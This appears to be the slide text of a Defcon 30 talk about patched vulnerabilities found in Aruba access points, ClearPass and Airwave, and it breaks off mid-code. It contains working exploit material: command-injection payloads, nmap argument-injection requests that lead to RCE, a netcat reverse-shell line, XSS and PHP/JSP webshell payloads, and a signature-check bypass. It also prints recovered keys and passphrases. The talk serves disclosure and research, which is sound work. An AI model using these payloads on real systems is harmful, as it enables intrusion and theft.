Hunting Bugs In The Tropics

Daniel Jensen

Defcon 30
About Me

Live in Auckland, New Zealand

Senior Security Consultant in STA at CyberCX

Found some bugs while living in the tropics

@dozernz
Background

Vulnerabilities submitted to Aruba’s Bug Bounty program

Disclosed in Aruba Security Advisories > 60 days ago

Only a small subset of the bugs I’ve found in Aruba products ( > 200)

Aruba allows disclosure 60 days after public advisory (thanks!)
Target Details

**AP / IAP** (I = Instant, doesn’t require controller)
- Enterprise Wifi AP

**ClearPass**
- Policy Manager / Network Access Control

**Airwave Management Platform (AMP)**
- Network management, control infrastructure like switches, APs

**Airwave Glass**
- “Single Pane of Glass” for network monitoring. Can pull from AMPs or collect directly
AP / IAP - Target 1

Least research effort

Focused post-auth

One pre-authentication not yet fully patched

Few bug collisions with: https://alephsecurity.com/2021/07/15/aruba-instant/
AP / IAP Tech stack (8.9.0 on IAP315)

Runs an operating system called ArubaOS, Linux kernel
ARM (300, 500 series) | MIPS (100 series)
U-Boot (APBoot)
ArubaOS images signed (x509 CA), validated on boot by the bootloader
NAND and NOR flash, ~500mB memory
Per-device x509 certificate burned in at factory, TPM (Atmel)
SSH/Telnet Subshell (Instant)
Web Server (Instant)
PAPI
Central
Can extract root file system using binwalk, two rounds LZMA and CPIO

```
$ binwalk -M -e ArubaInstant_Ursa_8.7.0.0_75915
$ ls _ArubaInstant_Ursa_8.7.0.0_75915.extracted/_*/_*/cpio-root/
aruba bin debug dev etc lib mnt proc sbin sys tmp usr var
```

```
$ file aruba/bin/msgHandler
aruba/bin/msgHandler: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
```

Some GPL source: [https://github.com/shalzz/aruba-ap-310](https://github.com/shalzz/aruba-ap-310)
Research Access

Find and use exploit to get runtime shell access
  - Will revisit later!

Cross-compile statically linked binaries

BYO debug environment
  - buildroot can generate gdbserver, busybox, tcpdump etc…
Buildroot

Cross compile for numerous architectures
Runs on x64 Linux
Can also compile Kernel and Bootloader
Build a full Linux suite of binary tools
Can compile statically

Build Options -> Libraries -> (Static|Shared) Only)

Cross compile gdbserver, can debug on target
Menuconfig Interface
Target packages
Arrow keys navigate the menu. <Enter> selects submenus ---(or empty submenus ----). Highlighted letters are hotkeys. Pressing <Y> selects a feature, while <N> excludes a feature. Press <Esc><Esc> to exit, <?> for Help, </> for Search. Legend: [*] feature is selected

--- BusyBox
(package/busybox/busybox.config) BusyBox configuration file to use
() Additional BusyBox configuration fragment files
[*] Show packages that are also provided by busybox
   *** Busybox individual binaries need a toolchain w/ dynamic
[ ] Install the watchdog daemon startup script
Audio and video applications --->
Compressors and decompressors --->
Debugging, profiling and benchmark --->
Development tools --->
Filesystem and flash utilities --->
Test, measure, and analyze --->
/tmp/s # ./tcpdump -ni any -X | head
tcpdump: data link type LINUX_SLL2
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 2
12:33:21.286050 br0 Out IP 192.168.1.188.22 > 192.168.1.50.63894: Flags [k
3800942613, win 663, length 96
0x0000: 4510 0088 7e99 4000 4006 3788 c0a8 01bc E...~.@.7.....
0x0010: c0a8 0132 0016 f996 79b7 af2c e28d c815 ...2.....y...,.....
0x0020: 5018 0297 855b 0000 bda0 fc2c 8c24 d578 P....[.....,$.x
0x0030: a06d 3599 97c0 e7ff 4835 0c90 de54 13b3 .m5.....h5...t...
0x0040: fc32 fc41 d26e 3819 b27b 6875 0eee b39b .2.A.n8..{hu....
0x0050: aec8 2642 e9da 7938 e688 980a 348f 4ca2 ..&b..y8....4.L.
0x0060: 9dc5 f631 2e84 979e 8830 41d6 2ecf 80cf ...1.....0a....
0x0070: c9eb f3d3 2a19 cd13 0631 be21 591b 8872 ....*.....1.Y..r
0x0080: 6343 c882 5856 5302 cC..XVS.
./gdbserver --attach <ip>::<port> <pid>

/tmp/s # ps -ef | grep telem
   6850 root    2548 S  /aruba/bin/telemetryd
 22275 root    640 S < grep telem
/tmp/s # ./gdbserver --attach :9001 6850
Attached; pid = 6850
Listening on port 9001
Remote debugging from host 192.168.1.50, port 1776
$ gdb-multiarch
(gdb) set follow-fork-mode child
(gdb) target remote 192.168.1.188:9001
Remote debugging using 192.168.1.188:9001
Reading /aruba/bin/telemetryd from remote target...
<...> Reading /lib/libuclibc_patch_lib.so from remote target...
Reading /lib/libdispatcher.so from remote target...
<...> Reading /lib/ld-uClibc.so.0 from remote target...
0x40199ca8 in select () from target:/lib/libc.so.0
(gdb) bt
#0  0x40199ca8 in select () from target:/lib/libc.so.0
#1  0x402587a0 in SelectionSelectTimeout () from target:/lib/libdispatcher.so
#2  0x4025760c in DispProcess () from target:/lib/libdispatcher.so
#3  0x0000bf00 in ?? ()
DHCP Command Injection - CVE-2020-24636

IAPs attempt to discover Airwave server via DNS

Straightforward command injection

Vulnerable parameter in DHCP option 15

Domain name suffix

Requires handing out DHCP lease to exploit

Newly reset or misconfigured AP

Reading docs illuminates attack surface!

```
Enabling DNS-Based Discovery of the Provisioning AMP Server

Instant APs can now automatically discover the provisioning AMP server if the DHCP option 43 and Activate cannot perform ZTP and transfer the AirWave configuration to the Instant AP.

When a domain option xxx is included in the DHCP configuration, the Instant AP will search the DNS server records for aruba-airwave.xxx. When there is no domain option, the Instant AP will search only the server records for aruba-airwave.

To enable Instant APs to automatically discover the AMP server, create a DNS record for aruba-airwave.xxx or aruba-airwave in the DNS server. To use this feature on the AirWave side, enable certificate-based login. For information on how to enable certificate-based login, see PSK-Based and Certificate-Based Authentication.
```

```
dhcp-option=15,test whoami`b.local
```

```
```
Command Injectionception - CVE-?????-?????

Authenticated CLI subshell file write into /etc/httpd/custom/image via TFTP

A few restrictions on filename characters (no /, no space, length restriction).

CLI command `show amp-audit` will get the name of the file in this directory

Unsafely pass it to md5sum in a `system()` call
if (*char*) (DAT_0053fc00 + 0x120be62) != '\0') {
    strncpy(local_298, 0x80, "%s/%s", "/etc/httpd/custom/image", DAT_0053fc00 + 0x120be62);
}

sprintf(acStack1944, "md5sum %s %s %s %s %s %s %s %s %s %s > %s 2>/dev/null",
        "/aruba/radius/certs/lxcert.pem", "/aruba/radius/certs/ca.pem", "/aruba/conf/cpcert.pem",
        local_298, "/aruba/radius/certs/radseccert.pem", "/aruba/radius/certs/radsecca.pem",
        "/aruba/conf/uicert.pem", "/aruba/radius/certs/datatunnelcert.pem",
        "/aruba/radius/certs/datatunnelca.pem", "/aruba/conf/CUST_CA/awc_custom_ca.pem",
        "/aruba/conf/clearpass_ca.pem", "/tmp/cert.md5");

system(acStack1944);
`sh$IFS${A=$HOME}e*${A*${A*${A*${A*${A*sh*`}
`sh$IFS${A=$HOME}e*$A*$A*$A*$A*sh*`

**Backticks** for command injection

First `sh` starts a `/bin/sh` followed by a script path

`$IFS` instead of a space (blocked)

`$HOME` is `/` on this platform

`e` is the first letter of the files location path (`/etc/httpd/custom/image`)

`$A*` repeats to traverse into the target file’s directory

`*sh*` matches the initial `sh` in the filename, then wildcard matches the rest
`sh /e/***/*/**sh`

=>

`sh /etc/httpd/custom/image/`\ `sh$IFS${A=$HOME}e*$A*$A*$A*$A*sh*`


```
$ ls
`sh$IFS${A=${HOME:0:1}}t*$A*y$A*$A*sh*``
$ cat *

id
$ cat `sh$IFS${A=${HOME:0:1}}t*$A*y$A*$A*sh*``
cat: 'uid=1000(user)': No such file or directory
cat: 'gid=1000(user)': No such file or directory
cat:
'groups=1000(user),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),120(wireshark),133(scanner),141(kaboxer),146(docker)': No such file or directory
```
Another command injection vulnerability
Again, file creation with user controlled name
Again, file name used in `system()` call
CLI prevented file creation when filename contained any injection metacharacter, except

$( was allowed - but not if followed by a closing )

`DATA ) $($ DATA was allowed`

Define ) as a variable then use the variable:

```
$ touch "aa${VARA=)}bb\$(id${VARA}b"
$ ls
'aa)bb$(id)b'
```
ClearPass Policy Manager - Target 2

Policy Manager / Network Access Control
Web applications (mostly Java and PHP)
TACACS, RADIUS server
802.1X (Authentication Server)
EAP-*
Binary Agents on user hosts
Physical Hardware or Virtual Appliance
Tech Overview (6.10)

Linux - Centos 7

Apache HTTPD 2.4

Tomcat 8

PHP Guest management app

Microservices (Python, Golang) listening on localhost, proxy via Apache

Disk can be encrypted at install time via LUKS

Hardcoded root password xpertscan (locked and nologin)

GRUB2 has password set, randomly generated
Runtime Access

ClearPass restricts console and SSH to a subshell

Boot appliance from a live CD image (gparted)

Decrypt disk if needed

Add a new user to /etc/passwd, /etc/shadow, /etc/sudoers

Change new user shell to bash
# cd /mnt/
# mkdir boot
# mount /dev/sda1 boot
# mkdir /tmp/initramfs
# cd /tmp/initramfs/
# zcat /mnt/boot/initramfs-4.18.0-147.0.3.el7.x86_64.img | cpio -id --no-absolute-filenames
86095 blocks
# cat root/.luks_keyfile
CcltlbtZnVNk9uJjE/niEf59Vo8WUDuzsu3JH+Pk7Jo=
# cryptsetup luksOpen /dev/sdb1 mainDisk < root/.luks_keyfile
# cd /mnt/
# mkdir sdb
# mount /dev/mapper/mainDisk sdb/
# head -n2 sdb/etc/os-release
NAME="Aruba ClearPass Platform"
VERSION="6.10.0.180076"
# head -n1 sdb/etc/shadow
root:$1$o5AHJiwM$3V/MB601bNSToPzKbItR80::0:99999:7:::
**Attack surface**

- TacacsServer
- AgentController
- HTTPD

PROXY

**Insight**

- Guest
  - TIPS Frontend (Java)
  - TIPS Backend (Java)

**Microservices**

*Some exclusions*
Attack surface

/etc/httpd/conf.d/*

```
[conf.d]# ls
00-favicon.conf
00-host-check.conf
00-url-check.conf
01-cppm_saml_redirect.conf
activitydumpservice.conf
agent.conf
apache_async_netd.conf
apache_battery.conf
apache_insight.conf
apache-networkservices.conf
clearpass-guest-apigility.conf
clearpass-guest-app.conf
clearpass-guest-core.conf
clearpass-guest-extension-instances.conf
clearpass-guest-mdps-ie8-pragma.conf
cppm-access-control.conf
cppm-certs.conf
error.conf
forward_proxy.conf
graphite-vhost.conf
mod_jk.conf
mod_wstunnel.conf
optik-enabled-check.conf
php.conf
platform-store.conf
quick1x.conf
tips_api.conf
tips.conf
zz-tips-redirect-all.conf
zzz-redirect-all.conf
```

tips_api.conf: RewriteRule ^/tipsapi - [L]

zzz-redirect-all.conf: RewriteRule ^(.*)$
https://%{HTTP_HOST}/tips/welcome.action [R]

apache_battery.conf: RewriteRule ^/battery/dump.*
http://localhost:6601{%REQUEST_URI}?{%QUERY_STRING} [P]

tips_api.conf: JkMount /tipsapi/servlet/* frontendtomcat

clearpass-guest-core.conf: Alias /guest
"/opt/amigopod/www/"

apache_insight.conf: RewriteRule ^/insight*
http://localhost:7770{%REQUEST_URI}?{%QUERY_STRING} [P]
web.xml

```xml
<servlet>
    <servlet-name>downloads</servlet-name>
    <display-name>Common Download Servlet</display-name>
    <servlet-class>com.avenda.tips.utils.servlet.CommonDownloadServlet</servlet-class>
</servlet>

<servlet-mapping>
    <servlet-name>downloads</servlet-name>
    <url-pattern>/downloads/*</url-pattern>
</servlet-mapping>
```

struts.xml

```xml
<action name="tipsServerCertUploadCert"
    class="com.avenda.tips.admin.function.upload.ServerCertUploadCertAction">
    ..
```
dwr.xml

```
<create creator="new"
javascript="serviceTemplat
ate">
<param name="class"
value="com.avenda.tips.ad
min.client.web.serviceTem
plate.ServiceTemplateOper
ations"/>
</create>
```

ServiceTemplateOperations.java

```java
public CPPMServiceTemplateConfiguration
getServiceConfiguration(final Integer id)
```

Request Body

```
callCount=1
nextReverseAjaxIndex=0
c0-scriptName=serviceTemplate
c0-methodName=getServiceConfiguration
c0-id=0
c0-param0=number:1
batchId=0
instanceId=0
page=%2Ftips%2FdwrS%2Ftest%2FserviceTem
plate
scriptIdSessionId=<CSRF>
```
Enable debug yourself

Methods For: serviceTemplate (NewCreator for com.avenda.tips.admin.client.web.serviceTemplate.ServiceTemplateOperations)

To use this class in your javascript you will need the following script includes:

```javascript
<script type='text/javascript' src='tips/dwr/engine.js'></script>
<script type='text/javascript' src='tips/dwr/interface/serviceTemplate.js'></script>
```

In addition there is an optional utility script:

```javascript
<script type='text/javascript' src='tips/dwr/util.js'></script>
```

Replies from DWR are shown with a yellow background if they are simple or in an alert box otherwise.

The inputs are evaluated as Javascript so strings must be quoted before execution.

- `listRolesMap()`: Execute
- `getVendorsList()`: Execute
- `getSSOSupportedApplications()`: Execute
- `getRadSecCerts()`: Execute
- `getNetbiosName( "" )`: Execute
- `getNetbiosName( "" )`: Execute
- `getWebLoginPortals()`: Execute
- `saveService( 0 , [] , true )`: Execute
- `getTemplateConfigs( 0 )`: Execute
- `getServiceConfiguration( 1 )`: Execute
- `getTemplateCategories()`: Execute
- `getTemplatesByCategory( "" )`: Execute

(Warning: overloaded methods are not recommended. See below)
Static and Dynamic Java Analysis

Decompile

- Procyon for line mapping

  ~/procyon-decompiler-1.0-SNAPSHOT.jar --suppress-banner -sl

- CFR/Fernflower where Procyon fails

Tomcat Startup Script

  CATALINA_OPTS="$CATALINA_OPTS -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000"

IntelliJ IDEA Debugger
Configuration

Debugger mode: Attach to remote JVM
Transport: Socket
Host: 192.168.200.81  Port: 8000

Command line arguments for remote JVM:
-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000

Copy and paste the arguments to the command line when JVM is started

Use module classpath: WEB-INF

First search for sources of the debugged classes in the selected module classpath
"ajp-apr-127.0.0.1-8019-exec-6"@15,031 in group "main": RUNNING

doValidate:161, LoginSubmitAction (com.avenuda.tips.admin.client.web.main)

validate:41, ActionWithLicenseCheck (com.avenuda.common.admin.web)

doBeforeInvocation:250, ValidationInterceptor (com.opensymphony.xwork2.validator)
doIntercept:262, ValidationInterceptor (com.opensymphony.xwork2.validator)
doIntercept:49, AnnotationValidationInterceptor (org.apache.struts2.interceptor.validation)

to:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)

invoke:249, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:142, ConversionErrorInterceptor (com.opensymphony.xwork2.interceptor)
ton:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)

invoke:249, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:140, ParametersInterceptor (com.opensymphony.xwork2.interceptor)
ton:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)

invoke:249, DefaultActionInvocation (com.opensymphony.xwork2)
java.lang.ProcessBuilder.<init>

- Enabled
- Suspend: All
- Condition:
- Log: "Breakpoint hit" message
- Evaluate and log: command
- Remove once hit
- Disable until hitting the following breakpoint: <None>
- After hit: Disable again
Breakpoint reached

at com.avenda.tips.admin.api.ScriptAction.exec(ScriptAction.java:37)
at com.avenda.tips.admin.api.ScriptAction.exec(ScriptAction.java:23)
at com.avenda.tips.admin.api.SystemApi.patchInfo(SystemApi.java:353)
at com.avenda.tips.admin.client.web.main.TipsProductUtilOperations.getPatchInfo
at com.avenda.tips.admin.client.web.extSyncServers.ExtSyncServersOperations.getPatchInfo
at org.directwebremoting.impl.CreatorModule$1.doFilter(CreatorModule.java:172)
Pre-auth RCE 1 - Nmap Argument Injection

CVE-2022-23657

Some apps in backend instance can be reached through Apache proxy

Path traversal via ..;/ allowed access to other backend apps

Argument injection in a backend application leads to arbitrary write, RCE
# cat /etc/httpd/conf.d/activitydumpservice.conf

Alias /activitydumpservice  
"/var/avenda/tomcat/backend/webapps/activitydumpservice" 
  
JkMount /activitydumpservice/* backendtomcat

JkMount  - “A mount point from a context to a Tomcat worker.”
Client “posture validation” with nmap

Configurable via web interface, but options are validated.

Access via backend traversal has no parameter validation

User input passed to nmap command
private String constructNmapScanCmd(final String options, final String host) {
    return "sudo nmap -oX - " + options + " " + host;
}

public ScanResult scan(final String hostIp) throws NmapException {
    final String nmapScanCmd = this.constructNmapScanCmd(this.nmapOptions, hostIp);
    NmapScan.log.debug("NmapScan cmd={}", (Object)nmapScanCmd);
    Process p = null;
    try {
        p = Runtime.getRuntime().exec(nmapScanCmd);
        final InputStream nmapOutput = p.getInputStream();
        return this.getScanResult(nmapOutput);
    }
}
Runtime.getRuntime().exec(String command) does not invoke a shell

Tokenises the command string into a String[] then passes to ProcessBuilder
String host = "192.168.1.1`whoami`";
String command = "sudo nmap -oX - " + host;
Process p = Runtime.getRuntime().exec(command);

$ javac Nmap.java && java Nmap
Failed to resolve "192.168.1.1`whoami`".
WARNING: No targets were specified, so 0 hosts scanned.

$ strace -f -e execve java Nmap
execve("/usr/bin/sudo", ["sudo", "nmap", "-oX", "-", "192.168.1.1`whoami`"], 0x7fffc98db990 /* 50 vars */) = 0

But is vulnerable to argument injection…
Argument Injection vs Command Injection

Command Injection: Execute arbitrary commands

Argument Injection: Manipulate command arguments

Many Linux binaries have arguments that can lead to code execution

https://gtfobins.github.io/
Preventing command injection does not always prevent argument injection.

Needs different handling to prevent, depending on language.

Frequently overlooked vulnerability.

What's your favorite underrated type of security bug?

Mine: argument injection.

2:57 AM · Jul 29, 2019 · Twitter for Android
String host = "192.168.1.1 --help";
String command = "nmap " + host;
Process p = Runtime.getRuntime().exec(command);

$ javac Nmap.java && java Nmap
Nmap 7.92 (https://nmap.org)
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc.
$ strace -f -e execve java Nmap
execve("/usr/bin/nmap", ["nmap", "192.168.1.1", "--help"],
0x7fff054ffbd0 /* 50 vars */ = 0
Nmap has multiple arguments that can be used for exploitation

File write via various output formats

Default script `http-fetch.nse` will download a file and write it to a specified directory

Nmap scripts are written in Lua, can execute arbitrary commands

```python
os.execute('nc -e /bin/bash 192.168.200.137 4444');
```
POST
/activitydumpservice/..;/networkservices/postureservice/Audit?requestId=1&callbackInfo=invalid&auditType=NMAP&serverId=2&sessionId=1&clientIp=--script=/usr/share/nmap/scripts/http-fetch.nse%20--script-args=http-fetch.destination=/tmp/z,http-fetch.url=a123%20192.168.200.137 HTTP/1.1


POST
/activitydumpservice/..;/networkservices/postureservice/Audit?requestId=2&callbackInfo=invalid&auditType=NMAP&serverId=2&sessionId=2&clientIp=--script=/tmp/z/192.168.200.137/80/a123%20192.168.200.137 HTTP/1.1
No egress? No problem!

1. POST
/activitydumpservice/./networkservices/postureservice/Audit?requestId=3&callbackInfo=invalid&auditType=NMAP&serverId=2&sessionId=3&clientIp=--data-string%20"%3c?=system('id')?%3e"%20-oN%20/opt/amigopod/www/cmd.php%20127.0.0.1 HTTP/1.1

    sudo nmap -oX - -O -p 1-1024 --host-timeout 60s --data-string "<?=system('id')?>"
    -oN /opt/amigopod/www/cmd.php 127.0.0.1

    # Nmap 7.70 scan initiated Fri Jul 15 14:49:02 2022 as: nmap -oX - -O -p 1-1024 --host-timeout 60s --data-string "uid=48(apache) gid=48(apache) groups=48(apache)
    uid=48(apache) gid=48(apache) groups=48(apache)" -oN /opt/amigopod/www/cmd.php 127.0.0.1
    Nmap scan report for localhost (127.0.0.1)
Agent Stored XSS - CVE-2021-26678

ClearPass can perform “Agent Posture Checks”

Similar to Cisco Anyconnect, F5, Fortinet, etc

Runs a binary on the computer attempting to connect and checks status of firewall, AV etc

Computer agent sends a HTTP POST PostureCheck result back to ClearPass

Authentication requirement configuration dependent
<xml version="1.0" encoding="UTF-8"?>
  <Username>000a296ad7f3</Username>
  <Password>000a296ad7f3</Password>
  <StatusMessage />
  <StatusMessage />
  <NetworkInterfaceInfo>
    <MacAddress>000a296ad7f3</MacAddress>
    <IpAddress>192.168.170.22</IpAddress>
  </NetworkInterfaceInfo>
  <Attributes Value="DESKTOP-OSV2\User" Name="Host:ActiveUserName" />
  <Attributes Value="FF-OSV2\&lt;img src=x onerror=alert('storedxss'); /&gt;AAl" Name="Host:FQDN" />
</AuthRequest>
### Endpoints

This page automatically lists all authenticated endpoints. An endpoint device is an Internet

**Filter:** MAC Address

<table>
<thead>
<tr>
<th>#</th>
<th>MAC Address</th>
<th>Hostname</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>00-0A-29-6A-D7-F3</td>
<td>FF-OSV2&lt;img src=x onerror=alert('storedxss'); &gt;/AA1</td>
</tr>
<tr>
<td>2.</td>
<td>00-0C-29-26-0B-C3</td>
<td></td>
</tr>
<tr>
<td>3.</td>
<td>00-0C-29-3E-65-5B</td>
<td>k3</td>
</tr>
</tbody>
</table>
### Inventory

<table>
<thead>
<tr>
<th></th>
<th>MAC ADDRESS</th>
<th>IP ADDRESS</th>
<th>HOSTNAME</th>
<th>CATEGORY</th>
<th>FAMILY</th>
<th>DEVICE NAME</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>00-0A-29-6A-D7-F2</td>
<td>192.168.170.22</td>
<td>FF-OSV2AA1</td>
<td>Computer</td>
<td>Windows</td>
<td>Windows 10</td>
</tr>
<tr>
<td>2</td>
<td>00-0A-29-6A-D7-F3</td>
<td>192.168.170.22</td>
<td>FF-OSV2AA1</td>
<td>Computer</td>
<td>Windows</td>
<td>Windows 10</td>
</tr>
</tbody>
</table>

192.168.200.81 says stored XSS
Classloader Manipulation - CVE-2021-40996

Recall a classic Struts 1 vulnerability - CVE-2014-0114

Apache BeanUtils allowed classloader manipulation

`populate()` method uses getters and setters to “populate” a bean

“Fixed” in BeanUtils 1.9.2 - except not by default

Properly fixed in BeanUtils 1.9.4, assigned CVE-2019-10086
ClearPass used to use a vulnerable version of BeanUtils

ClearPass allowed Bean population via unauthenticated HTTP endpoint

```java
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    try {
        DbcnInfo dbcnInfo = new DbcnInfo();
        CommunicationUtils.populateBean(dbcnInfo, HttpUtils.asParamsMap(req));
    } catch (Exception e) {
        // Handle exception
    }
}
```

```java
public static void populateBean(CommunicationBean commBean, Map<String, String> reqParams) throws TipsException {
    try {
        BeanUtils.populate(commBean, reqParams);
    } catch (Exception e) {
        // Handle exception
    }
}
```

```
POST /tips/AdminDbcn?class.classLoader.value=a => DbcnInfo.getClass().getClassLoader().setValue(a)
```
ClearPass running Tomcat 7 when I reported this issue

Can override the docBase (destructive!)

Can also set an alias of a URL path to anywhere on the file system

- File read via GET
- RCE via JSP file upload (where upload ability exists)
RewriteRule ^.*\..properties$  -  [F]

POST
/tips/AdminDbcn?class.classLoader.resources.dirContext.aliases=/read=/usr/local/avenda/tips/etc/etc_password.properties HTTP/1.1

GET /tips/read/cluster-password.properties; HTTP/1.1
POST /tipsapi/config/write/AdminUser HTTP/1.1
Authorization: Basic Y2x1c3RlcmFkbWluOmhpIGRlZmNvbiAzMCE=
Content-Type: text/plain
Content-Length: 448

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><TipsApiRequest xmlns="http://www.avendasys.com/tipsapiDefs/1.0"><TipsHeader version="6.10" source="Admin"/></TipsApiRequest>

POST /tips/restoreFileUpload.action HTTP/1.1
Cookie: <valid>
Content-Length: 867
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

-----WebKitFormBoundaryXyFVlnzPWaCC2jrn
Content-Disposition: form-data; name="backupFile"; filename="test1.jsp"
<JSP SHELL>
Alias to temporary file upload directory

POST
/tips/AdminDbcn?class.classLoader.resources.dirContext.aliases=/shell=/tmp/tips HTTP/1.1

JSP shell reachable

GET /tips/shell/test1.jsp?cmd=whoami HTTP/1.1

avendatomcat
Signature Check Bypass CVE-2021-26679

Insight Python Application

Custom “Report” definition

Signed custom report definitions, YAML file

```
yaml.load
```

Uses same signing key as other ClearPass updates
Update Format

Patches are tar files

Zip and an OpenSSL signature for the zip signed by an Aruba CA

Inside the zip is a .bin file

Encrypted tar.gz file with static GPG key

PASS="A&as30ja^@gsAS323Ar1#@5Ff285Ga"

gpg1 --passphrase $PASS --output <out.tar.gz> <in.bin>
Insight Custom Report Loading

Accept a user supplied template update tar `<whatever.signed.tar>`

Untar into `/tmp/insight_templates`

Validate the signature of the inner tgz using shell script, otherwise exit

Extract the inner tgz into the `/tmp/insight_templates` folder, otherwise exit

(Unsafely) Load the YAML in the `/tmp/insight_templates` folder
verify_key_custom_template.sh

tax xf "$1" --directory /tmp/insight_templates
DGST_FILENAME=`echo "$1" | sed 's/\..*signed\..*tar$/\1'`
sudo openssl dgst -sha256 -verify 
<SNIP>/hpe_arubadev_pubkey.pem -signature
"/tmp/insight_templates/$DGST_FILENAME.tgz.signature"
"/tmp/insight_templates/$DGST_FILENAME.tgz"

admin.py

filename_to_untar = template_file.filename.split(".")[0]
untar_templates_ab = ph.ArgBuilder("tar").with_str("-zxvf")
  .with_fmt("/tmp/insight_templates/%s.tgz", filename_to_untar)
  .with_str("-C").with_str("insight_templates")
Issues

Uses same signing public key as ClearPass updates

- ClearPass updates have tar’d zip files, Insight expects tar’d tgz files

The /tmp/insight_templates directory is reused

The tar file can contain unsigned files

Shell script and Python script construct the inner TGZ filename differently

```
DGST_FILENAME=`echo "$1" | sed 's/\.signed\.tar$//'`

vs

template_file.filename.split(".")[0]
```
Exploitation

Take an existing valid ClearPass update file

Rename `.zip` and `.zip.signature` as `.tgz` and `.tgz.signature`
- This will pass the shell script signature validation

Create a dummy tgz file with same name before first `. character`
- Needed to pass the Python tar extraction, otherwise the YAML isn’t loaded

Create a YAML file to exploit `yaml.load`

Collect all into one tar file, upload

Signature check bypassed, YAML loaded unsafely for RCE
$ mv signed.zip 2.b.tgz
$ mv signed.zip.signature 2.b.tgz.signature
$ tar czvf 2.tgz <dummyfile>
$ tar cvf 2.b.signed.tar 2.b.tgz 2.b.tgz.signature 2.tgz 2.yaml
Go binary `apis` listening on `127.0.0.1:7007`

Reachable via `/cppm/api/*` proxy path through Apache

Go binary attempts to access the X-Forwarded-For (XFF) header in the incoming HTTP request

- If this doesn’t exist, fall back to the RemoteAddr string
- If XFF or RemoteAddr aren’t equal to localhost or `127.0.0.1`, require a valid Authorization header

Apache disallows setting XFF localhost in request headers

```
RequestHeader unset X-Forwarded-For "expr=%{HTTP:X-Forwarded-For} =~ m#127(\.(\d+){0,3}|localhost|::1|\d+:{7})0#i"
```
We can remove the XFF header entirely with a Hop by Hop Header

GET /cppm/api/v1/sys/version HTTP/1.1
Host: 192.168.200.81
Connection: close, X-Forwarded-For

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2022 03:39:45 GMT
Server: Apache
Content-Length: 15
Content-Type: application/json
Connection: close

"6.10.0.180076"
13.5.1 End-to-end and Hop-by-hop Headers

For the purpose of defining the behavior of caches and non-caching proxies, we divide HTTP headers into two categories:

- End-to-end headers, which are transmitted to the ultimate recipient of a request or response. End-to-end headers in responses MUST be stored as part of a cache entry and MUST be transmitted in any response formed from a cache entry.

- Hop-by-hop headers, which are meaningful only for a single transport-level connection, and are not stored by caches or forwarded by proxies.

The following HTTP/1.1 headers are hop-by-hop headers:

- Connection
- Keep-Alive
- Proxy-Authenticate
- Proxy-Authorization
- TE
- Trailers
- Transfer-Encoding
- Upgrade

14.10 Connection

The Connection general-header field allows the sender to specify options that are desired for that particular connection and MUST NOT be communicated by proxies over further connections.
Aside

Found vulnerability in September 2021

Reproducing the vulnerability locally for this talk

Can’t get the XFF header stripped using hop-by-hop headers

Google for hop-by-hop in Apache…
Considered an Apache vulnerability…

**low: mod_proxy X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)**

Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on client side Connection header hop-by-hop mechanism.

This may be used to bypass IP based authentication on the origin server/application.

**Acknowledgements:** The Apache HTTP Server project would like to thank [Gaetan Ferry (Synaktiv)](https://www.synaktiv.com) for reporting this issue

**Update 2.4.54 released:** 2022-06-08

**Affects:** <=2.4.53

Reported to Apache by @_mabote_
Internal Service Access CVE-2022-23660

The `apis` contains an HTTP route for specifying a ClearPass upgrade image.

If image validation fails the tar file is deleted, however its contents remain.

Extract a symlink to an arbitrary destination on the file system.

Rerun upgrade with a second tar that extracts into the symlink directory.

Arbitrary File Write
testwrite.php:

```php
<?php system("id"); ?>
```

link.tar:

```
$ ln -s /opt/amigopod/www/ symlink
$ tar cf link.tar symlink
```

arb.tar:

```
$ vim symlink/testwrite.php
$ tar cf arb.tar symlink/testwrite.php
```
POST /cppm/api/v1/_internal/sys/upgrade HTTP/1.1  
Host: 192.168.200.81  
Connection: close, X-Forwarded-For  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 49  


GET /cppm/api/v1/_internal/sys/upgrade HTTP/1.1  
Host: 192.168.200.90  
Connection: close, X-Forwarded-For

POST /cppm/api/v1/_internal/sys/upgrade HTTP/1.1  
Host: 192.168.200.81  
Connection: close, X-Forwarded-For  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 49  


GET /cppm/api/v1/_internal/sys/upgrade HTTP/1.1  
Host: 192.168.200.90  
Connection: close, X-Forwarded-For

uid=48(apache) gid=48(apache) groups=48(apache)
Airwave (AMP) - Target 3

Network Management System

Provision APs

Collects data from controllers, APs

Physical Hardware or Virtual Appliance
Airwave Tech Stack (8.2.10)

Linux - Centos 7

Nginx Reverse Proxy

Apache HTTPD serving primary web application (Perl)

Java apps (VisualRF, Topology, others)

CLI/SSH subshell
*Some exclusions
RADIUS mode auth bypass (and RCE)
CVE-2021-25147

Airwave application supports RADIUS authentication

How to determine if the RADIUS authentication attempt was successful?
Should we:

Use a reliable Perl library that supports RADIUS authentication?
Should we:

Use a reliable Perl library that supports RADIUS authentication?

❌
Should we:

Shell out to a binary used for config tests and just regex the output?
Should we:

Shell out to a binary used for config tests and just regex the output?

✔️
# escape any double quotes for the quotations below.
# it IS possible for a password to have such.
# not sure about a username.

my $username2 = $username;
my $password2 = $password;
for ($username2, $password2) {
